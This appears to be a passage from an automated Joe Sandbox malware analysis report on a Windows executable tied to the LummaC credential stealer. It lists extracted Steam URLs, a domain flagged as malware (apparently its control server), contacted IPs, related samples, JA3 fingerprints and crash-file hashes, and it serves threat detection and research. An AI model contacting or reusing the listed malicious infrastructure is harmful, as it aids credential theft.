                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                    		unknown
                                                                                                                                    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.00000000009EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://recaptcha.net/recaptcha/;3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://steamcommunity.com/discussions/3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://store.steampowered.com/stats/3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://medal.tv3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://broadcast.st.dl.eccdnx.com3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://store.steampowered.com/steam_refunds/3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.00000000009EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://steamcommunity.com/login/home/?goto=profiles%2F765611997243319003zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620163zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://steamcommunity.com/workshop/3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://login.steampowered.com/3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://store.steampowered.com/legal/3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.00000000009EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://recaptcha.net3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://upx.sf.netAmcache.hve.4.drfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://store.steampowered.com/3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://lev-tolstoi.com/apia3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://lev-tolstoi.com/7g3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://help.steampowered.com/3zg6i6Zu1u.exe, 00000000.00000003.1521087549.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://store.steampowered.com/account/cookiepreferences/3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.00000000009EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://store.steampowered.com/mobile3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://steamcommunity.com/3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn813zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1521087549.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1520896287.00000000009EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://lev-tolstoi.com/pi3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, 3zg6i6Zu1u.exe, 00000000.00000003.1510745566.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://steamcommunity.com/profiles/76561199724331900/badges3zg6i6Zu1u.exe, 00000000.00000003.1510688995.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high

                                                                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                                                Public IPs

                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                172.67.157.254
                                                                                                                                                                                                                		lev-tolstoi.comUnited States
                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                23.55.153.106
                                                                                                                                                                                                                		steamcommunity.comUnited States
                                                                                                                                                                                                                		20940AKAMAI-ASN1EUfalse

                                                                                                                                                                                                                General Information

                                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                Analysis ID:1580303
                                                                                                                                                                                                                Start date and time:2024-12-24 09:04:06 +01:00
                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                Overall analysis duration:0h 5m 20s
                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                Number of analysed new started processes analysed:10
                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                Sample name:3zg6i6Zu1u.exe
                                                                                                                                                                                                                renamed because original name is a hash value
                                                                                                                                                                                                                Original Sample Name:996aa4b544e08689f305d751c60835c7.exe
                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                Classification:mal100.troj.evad.winEXE@2/5@11/2
                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                • Successful, ratio: 95%
                                                                                                                                                                                                                • Number of executed functions: 20
                                                                                                                                                                                                                • Number of non-executed functions: 212
                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                • Found application associated with file extension: .exe

                                                                                                                                                                                                                Warnings

                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 13.89.179.12, 20.190.181.0, 20.12.23.50
                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                                                                Simulations

                                                                                                                                                                                                                Behavior and APIs

                                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                                03:05:05API Interceptor9x Sleep call for process: 3zg6i6Zu1u.exe modified
                                                                                                                                                                                                                03:05:27API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                                                IPs

                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                172.67.157.254L5Kgf2Tvkc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  fkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                                                                                                    Bire1g8ahY.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                      NfwBtCx5PR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        pJRiqnTih0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          xxLuwS60RS.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            9pyUjy2elE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              NQbg5Ht2hW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                BZuk2UI1RC.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    23.55.153.106oiF7u78bY2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      L5Kgf2Tvkc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        jSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          HK8IIasL9i.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            OGBLsboKIF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              NfwBtCx5PR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                pJRiqnTih0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  5XXofntDiN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    xxLuwS60RS.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse

                                                                                                                                                                                                                                                        Domains

                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                        lev-tolstoi.comoiF7u78bY2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                        L5Kgf2Tvkc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        fkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        LNn56KMkEE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                        BVGvbpplT8.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                        mgEXk8ip26.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                        Bire1g8ahY.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        jSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                        HK8IIasL9i.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                        NfwBtCx5PR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        steamcommunity.comL5Kgf2Tvkc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                        fkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                                                                                                                                        • 104.121.10.34
                                                                                                                                                                                                                                                        2ZsJ2iP8Q2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                                        LopCYSStr3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                                        LNn56KMkEE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                                        YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                                        VBHyEN96Pw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                                        BVGvbpplT8.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                                        613vKYuY2S.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                                        YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 104.102.49.254

                                                                                                                                                                                                                                                        ASNs

                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                        AKAMAI-ASN1EUoiF7u78bY2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                        Gq48hjKhZf.exeGet hashmaliciousLodaRATBrowse
                                                                                                                                                                                                                                                        • 172.232.216.250
                                                                                                                                                                                                                                                        L5Kgf2Tvkc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                        7uJ95NO82G.exeGet hashmaliciousLodaRATBrowse
                                                                                                                                                                                                                                                        • 172.232.216.250
                                                                                                                                                                                                                                                        nabx86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 23.7.216.65
                                                                                                                                                                                                                                                        Violated Heroine_91zbZ-1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 184.85.182.130
                                                                                                                                                                                                                                                        [External] 120112 Manual Policies Overview Guide_ 8VM8-WZPT3L-LYH1.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 23.195.39.65
                                                                                                                                                                                                                                                        ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        • 23.219.82.25
                                                                                                                                                                                                                                                        nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 104.126.116.105
                                                                                                                                                                                                                                                        jSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                        CLOUDFLARENETUSoiF7u78bY2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                        L5Kgf2Tvkc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        LVDdWBGnVE.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                        • 104.21.63.229
                                                                                                                                                                                                                                                        O5Vg1CJsxN.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                        • 104.21.36.201
                                                                                                                                                                                                                                                        2oM46LNCOo.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.199.72
                                                                                                                                                                                                                                                        J18uCKmoAw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.209.202
                                                                                                                                                                                                                                                        y001L6lEK4.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                        • 172.67.199.72
                                                                                                                                                                                                                                                        tTGxYWtjG5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.199.72
                                                                                                                                                                                                                                                        iaLId0uLUw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.199.72
                                                                                                                                                                                                                                                        4W3cB5WEYH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 104.21.36.201

                                                                                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                        a0e9f5d64349fb13191bc781f81f42e1oiF7u78bY2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                        L5Kgf2Tvkc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                        LVDdWBGnVE.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                        O5Vg1CJsxN.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                        2oM46LNCOo.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                        J18uCKmoAw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                        y001L6lEK4.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                        tTGxYWtjG5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                        iaLId0uLUw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                                        4W3cB5WEYH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                        • 23.55.153.106

                                                                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bad_module_info_f5b4a6202a53ee73c263cc4c99e711b13cd935ac_85207d7d_1d9d95b9-5e0e-4c83-9470-ff766952d273\Report.wer

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                                                                        Entropy (8bit):0.5832866726116527
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:i6JjjJ+CejUpLOsQhMov7JfqQXIDcQ4c6fcE+cw3tZAX/d5FMT2SlPkpXmTAPf/0:5w1jQLOD0WbkQzuiF3Z24IO8b
                                                                                                                                                                                                                                                        MD5:7DADAF2D5D22F5B8128CF98C558A9811
                                                                                                                                                                                                                                                        SHA1:0F3E42A0C0F54B6B014836CF84AF3B21E241C071
                                                                                                                                                                                                                                                        SHA-256:D004E26561A6C6E5C68B615D6198E21ECA3D5E47BDD99B9A6567DD1F096E4C16
                                                                                                                                                                                                                                                        SHA-512:68A9DAD4589FE7C24014714E05D797DA8FED88B0F9335381E65BD8DDD4EFC51D2104D2F7D8E7A0F8C66DF18D816702E2CFC5D8D6F6715287ED6706F33FE9E081
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
